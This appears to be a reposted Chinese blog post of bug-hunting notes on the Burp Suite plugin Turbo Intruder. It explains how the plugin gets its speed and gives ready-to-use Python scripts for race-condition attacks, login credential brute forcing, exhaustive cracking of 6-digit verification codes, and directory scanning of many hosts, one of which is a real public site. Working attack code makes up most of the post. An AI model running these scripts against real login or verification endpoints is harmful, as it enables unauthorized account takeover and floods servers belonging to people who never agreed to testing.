bp挖洞插件-记录
Turbo Intruder 使用 - 拥抱十亿请求攻击
Turbo Intruder 简介
Turbo Intruder 是一个 BurpSuite 插件,用于发送大量HTTP请求并分析结果。它的设计目的是补充 Intruder 的不足。它的特点如下:
快速 -Turbo Intruder 使用了一个重写的 HTTP 栈 ,用于提升速度。在许多目标上,它甚至可能超过流行的异步 Go 脚本。
可扩展 -Turbo Intruder 运行时使用很少的内存,从而可以连续运行几天。同时可以脱离 burpsuite 在命令行下使用。
灵活 - Turbo Intruder 的攻击是使用 Python 配置的。这样可以处理复杂的要求,例如签名的请求和多步攻击序列。此外,自定义 HTTP 栈意味着它可以处理其他库无法处理的畸形格式请求。
方便 - 它的结果可以通过 Backslash Powered Scanner 的高级差异算法自动过滤。这意味着您可以单击两次即可发起攻击并获得有用的结果。
有多快
这速度是什么概念呢?以 6 位数验证码的爆破为例,一共 1000000 个请求, 每秒 20000个请求, 只需 50 秒即可爆破成功,即使你的验证码有效期是 1 分钟,也会被暴力破解!所以不要认为6位的验证码就足够安全!
当然,上面的速度是比较极限的,应该是在云主机 vps 上的带宽使用 burpsuite 。
我们的家用网络一般达不到这种速度,但每秒几百个请求还是很轻松的,以每秒 1000 个请求计算, 6位数的验证码,1000000个请求,也只需1000秒,也就是16分钟即可破解。
Turbo Intruder 底层原理
Turbo Intruder 使用自定义的 HTTP 栈来和服务器进行通信。
首先它会使 Connection: keepalive 头发起 HTTP 请求,如果是使用默认的 Connection: close 头,那么每次和服务器建立 HTTP 请求时都要重新建立一条 TCP 连接,这样比较浪费时间。
Connection: keepalive 头可以复用同一条 TCP 连接来发送多个 HTTP 请求, 这样就可以节省重复建立 TCP 连接的时间。 从下图可以看出,使用 Connection: keepalive 头后速度是原来的 400% 。
另外, 它还使用了 HTTP Pipelining (HTTP 管道)的方式来发送 HTTP 请求,这种方式会一次性发送几十个 HTTP 请求到服务器, 然后再一次性读取几十个请求响应。通过 HTTP 管道的方式,速度是一开始的 6000% !
使用
我们继续提升管道数为 10 ,速度提升到了 2634 , 但 Retries 达到了 41, 也就是需要重新发送的请求变多了,意味着网络不稳定了。因此我们对这个目标选择 concurrentConnections=5, requestsPerConnection=100, pipeline=True 作为最佳的参数。
应用
1.测试并发漏洞
race.py
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=30,
requestsPerConnection=100,
pipeline=False
)
# the 'gate' argument blocks the final byte of each request until openGate is invoked
for i in range(30):
engine.queue(target.req, target.baseInput, gate='race1')
# wait until every 'race1' tagged request is ready
# then send the final byte of each request
# (this method is non-blocking, just like queue)
engine.openGate('race1')
engine.complete(timeout=60)
def handleResponse(req, interesting):
table.add(req)
2.爆破账号密码
default.py
与扫描目录使用同个脚本
from urllib import quote
def password_brute(target,engine):
for word in open('/Users/mac/safe/web/brute/mypass.txt'):
engine.queue(target.req, quote(word.rstrip()))
def user_brute(target,engine):
for word in open('/Users/mac/safe/web/brute/myuser.txt'):
engine.queue(target.req, quote(word.rstrip()))
def user_password_brute(target, engine):
for password in open('/Users/mac/safe/web/brute/passwordtop100.txt'):
for user in open('/Users/mac/safe/web/brute/usertop100.txt'):
engine.queue(target.req, [quote(user.rstrip()),quote(password.rstrip())])
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=30,
requestsPerConnection=100,
pipeline=False
)
#user_brute(target,engine)
#password_brute(target,engine)
user_password_brute(target,engine)
def handleResponse(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length and req.response
if req.status == 302:
table.add(req)
3.爆破验证码
from itertools import product
def brute_veify_code(target, engine, length):
pattern = '1234567890'
for i in list(product(pattern, repeat=length)):
code = ''.join(i)
engine.queue(target.req, code)
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=30,
requestsPerConnection=100,
pipeline=True
)
brute_veify_code(target, engine, 6)
def handleResponse(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length and req.response
if 'error' not in req.response:
table.add(req)
4.对多个目标进行目录扫描
def mult_host_dir_brute():
req = '''GET /%s HTTP/1.1
Host: %s
Connection: keep-alive
'''
engines = {}
for url in open('/Users/mac/temp/urls.txt'):
url = url.rstrip()
engine = RequestEngine(endpoint=url,
concurrentConnections=5,
requestsPerConnection=100,
pipeline=True)
engines[url] = engine
for word in open('/Users/mac/safe/web/brute/all.txt'):
word = word.rstrip()
for (url, engine) in engines.items():
domain = url.split('/')[2]
engine.queue(req, [word, domain])
def queueRequests(target, wordlists):
mult_host_dir_brute()
def handleResponse(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length and req.response
if req.status != 404:
table.add(req)
其中 urls.txt 里面存放了两个首页的 URL:
https://www.baidu.com
http://172.16.108.176
代码中第9行处定义了一个请求模板,里面两个插入点 %s ,一个是路径的位置,一个是 Host 头的位置, 接着在第8至14行为每个请求新建一个请求 engine, 每个 engine 负责扫描一个 URL, 在16-20行添加字典进队列进行扫描。
这时可以用随便一个请求来打开 Turbo Intruder 窗口,输入上面代码,把要扫描的 url 放到 urls.txt 即可扫描。
注意,需要在第8和16行处替换成你自己的 urls.txt 和目录字典的路径。
5.总体代码
from urllib import quote
from itertools import product
def concurrency(target,engine):
# the 'gate' argument blocks the final byte of each request until openGate is invoked
for i in range(30):
engine.queue(target.req, gate='race1')
# wait until every 'race1' tagged request is ready
# then send the final byte of each request
# (this method is non-blocking, just like queue)
engine.openGate('race1')
engine.complete(timeout=60)
def parameter_brute(target,engine):
for word in open('/Users/mac/safe/web/brute/AllParam.txt'):
engine.queue(target.req, word.rstrip())
def dir_brute(target, engine):
for word in open('/Users/mac/safe/web/brute/dir_scan/all_dir.txt'):
#for word in open('/Users/mac/safe/web/brute/all.txt'):
engine.queue(target.req, word.rstrip())
def mult_host_dir_brute():
req = '''GET /%s HTTP/1.1
Host: %s
Connection: keep-alive
'''
engines = {}
for url in open('/Users/mac/temp/urls.txt'):
url = url.rstrip()
engine = RequestEngine(endpoint=url,
concurrentConnections=5,
requestsPerConnection=100,
pipeline=True)
engines[url] = engine
for word in open('/Users/mac/safe/web/brute/all.txt'):
word = word.rstrip()
for (url, engine) in engines.items():
domain = url.split('/')[2]
engine.queue(req, [word, domain])
def password_brute(target,engine):
for word in open('/Users/mac/safe/web/brute/mypass.txt'):
engine.queue(target.req, quote(word.rstrip()))
def user_brute(target,engine):
for word in open('/Users/mac/safe/web/brute/myuser.txt'):
engine.queue(target.req, quote(word.rstrip()))
def user_password_brute(target, engine):
for password in open('/Users/mac/safe/web/brute/passwordtop100.txt'):
for user in open('/Users/mac/safe/web/brute/usertop100.txt'):
engine.queue(target.req, [quote(user.rstrip()),quote(password.rstrip())])
def brute_veify_code(target, engine, length):
# pattern = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890'
pattern = '1234567890'
for i in list(product(pattern, repeat=length)):
code = ''.join(i)
engine.queue(target.req, code)
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=30,
requestsPerConnection=100,
pipeline=True
)
#brute_veify_code(target, engine, 5)
dir_brute(target, engine)
#user_brute(target,engine)
#concurrency(target,engine)
#password_brute(target,engine)
#user_password_brute(target,engine)
#mult_host_dir_brute()
def handleResponse(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length and req.response
if req.status != 404 and req.status != 302:
#if req.wordcount != 1197 and req.wordcount != 1196:
#if 'success' in req.response:
#if req.length == 461:
#if interesting:
table.add(req)
————————————————
版权声明:本文为CSDN博主「TimeShatter」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_28205153/article/details/113832488
浙公网安备 33010602011771号